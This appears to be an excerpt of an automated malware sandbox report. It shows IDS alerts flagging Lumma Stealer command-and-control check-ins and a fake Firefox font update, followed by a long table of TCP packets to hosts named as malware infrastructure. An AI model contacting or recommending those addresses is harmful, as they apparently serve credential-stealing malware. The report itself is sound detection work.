                                                          2024-12-24T02:18:39.723586+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849727172.67.195.241443TCP
                                                          2024-12-24T02:18:39.726092+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849728172.67.195.241443TCP
                                                          2024-12-24T02:18:42.029577+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849729172.67.195.241443TCP
                                                          2024-12-24T02:18:44.807871+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849730172.67.195.241443TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Dec 24, 2024 02:18:16.651305914 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.655826092 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.655875921 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.656013012 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.660480976 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.660530090 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.660692930 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.665172100 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.665376902 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.665429115 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.669845104 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.669898033 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.670145035 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.674544096 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.674591064 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.674683094 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.679155111 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.679199934 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.679326057 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.683815002 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.683907032 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.683999062 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.688504934 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.688559055 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.688738108 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.693154097 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.693203926 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.693372011 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.697824001 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.697882891 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.698136091 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.702516079 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.702564955 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.702722073 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.707195044 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.707364082 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.707406044 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.711905003 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.711961985 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.712094069 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.716614008 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.716679096 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.716783047 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.721293926 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.721389055 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.721693039 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.725936890 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.725996017 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.726094961 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.730593920 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.730652094 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.730782032 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.741445065 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.741520882 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.742388010 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.742448092 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.742630005 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.744386911 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.744436026 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.744582891 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.748388052 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.748437881 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.748569012 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.752358913 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.752408028 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.752549887 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.756124973 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.756180048 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.756331921 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.759963036 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.760024071 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.760164022 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.763703108 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.763757944 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.763874054 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.767287970 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.767339945 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.767476082 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.770860910 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.770929098 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.770973921 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.774214029 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.774281979 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.774404049 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.777746916 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.777821064 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.778083086 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.781193972 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.781219006 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.781250000 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.784446955 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.784682035 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.784751892 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.787884951 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.787940979 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.788098097 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.791337013 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.791402102 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.791532993 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.794744968 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.794791937 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.794934988 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.798155069 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.798221111 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.798357964 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.801616907 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.801719904 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.801780939 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.805020094 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.805131912 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.805211067 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.808442116 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.808479071 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.808635950 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.811870098 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.811955929 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.812077045 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.813760996 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.813971996 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.814023018 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.815416098 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.815612078 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.815638065 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.816014051 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.816382885 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.816435099 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.818716049 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.818921089 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.818965912 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.822130919 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.822273970 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.822343111 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.822784901 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.822798014 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.822860003 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.824235916 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.824431896 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.824503899 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.825546980 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.825592041 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.825751066 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.828131914 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.828324080 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.828371048 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.828939915 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.829015970 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.829161882 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.832042933 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.832250118 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.832365990 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.832642078 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.832679987 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.833040953 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.835853100 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.835905075 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.836092949 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.836106062 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.836846113 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.836957932 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.839246035 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.839407921 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.839442968 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.839845896 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.840255022 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.840306997 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.842688084 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.842725039 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.842914104 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.843350887 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.843708992 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.843832970 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.846092939 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.846147060 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.846318007 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.847029924 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.847224951 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.847385883 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.849534035 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.849587917 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.849762917 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.850651026 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.850838900 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.851063967 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.852977991 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.853024006 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.853207111 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.854110003 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.854322910 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.854523897 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.856405973 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.856463909 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.856590033 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.857530117 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.857726097 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.857780933 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.859803915 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.859847069 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.860004902 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.860843897 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.861033916 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.861088991 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.863280058 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.863531113 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.863570929 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.864197016 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.864439011 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.864490986 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.866681099 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.866847038 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.866925001 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.867491961 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.867716074 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.867777109 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.870105982 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.870157957 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.870315075 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.870867014 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.871088982 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.871148109 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.872631073 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.872855902 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.872905016 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.873549938 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.873615980 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.062643051 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.064178944 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.064254999 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.064374924 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.065948963 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.066028118 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.066149950 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.067662001 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.067831993 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.067990065 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.069421053 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.069468975 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.069618940 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.071206093 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.071265936 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.071413994 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.072952986 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.073009014 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.073147058 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.074666977 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.074841022 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.074865103 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.076411009 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.076472998 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.076610088 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.078146935 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.078190088 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.078357935 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.079900980 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.080008984 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.080095053 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.081645012 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.081691027 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.081855059 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.083381891 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.083437920 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.083604097 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.085274935 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.085366964 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.110922098 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.123756886 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.123967886 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.124025106 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.124351978 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.124775887 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.124825001 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.125552893 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.125848055 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.125925064 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.126761913 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.127074957 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.127118111 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.127985954 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.128211975 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.128259897 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.129196882 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.129407883 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.129450083 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.130383015 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.130611897 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.130647898 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.131602049 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.131979942 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.132025957 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.132824898 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.133052111 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.133100033 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.133980036 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.136643887 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.136857033 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.136914968 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.137509108 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.137742043 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.137871981 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.139256001 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.198220968 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.198353052 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.198415995 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.198796988 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.198885918 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.199157000 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.199780941 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.199835062 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.199984074 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.200891972 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.200951099 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.201111078 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.201962948 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.202003002 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.202168941 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.203042984 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.203090906 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.203228951 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.204093933 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.204143047 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.204308033 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.206513882 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.206811905 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.206859112 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.207083941 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.207123995 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.207776070 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.208003998 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.208606958 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.208806038 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.209031105 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.209075928 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.209891081 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.210103989 CET8049707147.45.44.131192.168.2.8
